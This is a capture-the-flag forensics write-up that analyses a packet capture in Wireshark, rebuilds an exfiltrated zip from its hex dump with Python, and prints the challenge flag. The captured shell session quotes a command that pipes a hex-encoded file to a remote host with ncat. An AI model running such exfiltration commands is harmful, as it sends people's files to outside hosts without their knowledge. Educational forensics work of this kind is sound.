Writeup by erdnaxe for Cap ou Pcap

intro forensics network

November 5, 2023

Table of contents

Exploration

We download cap.pcap and ask file to identify it:

$ file cap.pcap
cap.pcap: pcap capture file, microsecond ts (little-endian) - version 2.4 (Ethernet, capture length 262144)

cap.pcap is a network capture in PCAP format. We open the capture in Wireshark:

cap.pcap in Wireshark

We identify two TCP sessions (represented by the square bracket in the left):

  • the first TCP session starts at packet 1 and ends at packet 37,
  • the second TCP session starts at packet 24 and ends at packet 31.

We right click, then “Follow > TCP Stream” to take a look at the exchanged TCP data.

The first TCP stream contains some shell commands:

> id
< uid=1001(fcsc) gid=1001(fcsc) groups=1001(fcsc)
> pwd
< /home/fcsc
> w
<  07:10:25 up 24 min,  1 user,  load average: 0.00, 0.00, 0.00
< USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
< fcsc     tty7     :0               06:46   24:47   3.13s  0.00s /bin/sh /etc/xdg/xfce4/xinitrc -- /etc/X11/xinit/xserverrc
> ls
< Desktop
< Documents
< Downloads
< Music
< Pictures
< Public
< Templates
< Videos
> ls Documents
< flag.zip
> file Documents/flag.zip
< Documents/flag.zip: Zip archive data, at least v2.0 to extract
> xxd -p Documents/flag.zip | tr -d '\n' | ncat 172.20.20.133 20200
> exit

We observe that Documents/flag.zip is exfiltrated to 172.20.20.133:20200.

The second TCP stream contains:

504b0304140000000800a231825065235c39420000004700000008001c00666c61672e7478745554090003bfc8855ebfc8855e75780b000104e803000004e80300000dc9c11180300804c0bfd5840408bc33630356e00568c2b177ddef9eeb5a8fe6ee06ce8e5684f0845997192aad44ecaedc7f8e1acc4e3ec1a8eda164d48c28c77b7c504b01021e03140000000800a231825065235c394200000047000000080018000000000001000000a48100000000666c61672e7478745554050003bfc8855e75780b000104e803000004e8030000504b050600000000010001004e000000840000000000

This may be the exfiltrated Documents/flag.zip. This makes sense as this TCP stream starts after the call to xxd -p Documents/flag.zip | tr -d '\n' | ncat 172.20.20.133 20200, and ends before exit.

Proposed solution

We inverse xxd to reconstruct Documents/flag.zip from the second TCP stream.

xxd is a command found on Unix distributions to convert binary data to hexadecimal. Let’s write a Python script to inverse the hexadecimal transformation:

#!/usr/bin/env python3
data = bytes.fromhex("504b0304140000000800a231825065235c39420000004700000008001c00666c61672e7478745554090003bfc8855ebfc8855e75780b000104e803000004e80300000dc9c11180300804c0bfd5840408bc33630356e00568c2b177ddef9eeb5a8fe6ee06ce8e5684f0845997192aad44ecaedc7f8e1acc4e3ec1a8eda164d48c28c77b7c504b01021e03140000000800a231825065235c394200000047000000080018000000000001000000a48100000000666c61672e7478745554050003bfc8855e75780b000104e803000004e8030000504b050600000000010001004e000000840000000000")
with open("flag.zip", "wb") as f:
    f.write(data)

After running this script, we extract the flag and print it:

$ unzip flag.zip
Archive:  flag.zip
  inflating: flag.txt
$ cat flag.txt
FCSC{6ec28b4e2b0f1bd9eb88257d650f558afec4e23f3449197b4bfc9d61810811e3}